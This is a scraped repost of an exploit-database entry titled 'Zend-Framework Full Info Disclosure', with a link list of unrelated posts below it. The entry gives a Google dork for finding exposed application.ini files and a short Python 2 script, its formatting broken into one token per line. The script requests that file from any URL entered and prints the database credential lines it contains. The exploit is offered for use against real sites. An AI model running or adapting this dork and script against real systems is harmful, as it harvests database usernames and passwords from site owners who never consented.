Zend-Framework - Full Info Disclosure
来源:互联网 发布:java搞笑程序 编辑:程序博客网 时间:2024/04/29 15:15
# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux
#[Comment]Greetz : Daniel Godoy
#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file
#Vulnerable page : http://target.com/application/configs/application.ini
#!/usr/bin/python
import
string
import
re
from
urllib2
import
Request, urlopen
disc
=
"/application/configs/application.ini"
url
=
raw_input
(
"URL: "
)
req
=
Request(url
+
disc)
rta
=
urlopen(req)
print
"Result"
html
=
rta.read()
rdo
=
str
(re.findall(
"resources.*=*"
, html))
print
rdo
exit
- Zend-Framework - Full Info Disclosure
- Zend Framework suffers from a SQL configuration file disclosure vulnerability.
- full-disclosure发信
- Drupal 7.14 <= Full Path Disclosure Vulnerability
- zend framework
- Zend Framework
- Zend Framework
- zend framework,,,,,
- Zend frameWork
- zend framework
- zend framework
- zend framework
- Zend Framework
- zend studio + zend framework
- PHP <=5.3 – preg_match() full path disclosure
- Zend framework简介
- Zend Framework 入门教程
- Zend Framework and Mysql
- ARM920T内存管理单元MMU
- 戴维·卡梅伦
- linux shell编程指南第十七章------条件测试
- 【ZJOI2008】 COUNT
- android 通话记录的查询与删除
- Zend-Framework - Full Info Disclosure
- android输入设备配置文件搜索路径
- 关于如何写分治法程序和递归程序
- Windows/linux双系统的时间修改问题
- C++调用C# COM组件
- android删除和查询通话记录
- 关于rmi的研究
- linux 进程的权限与用户权限及文件属性的关系
- UVA 10354 nlogn LIS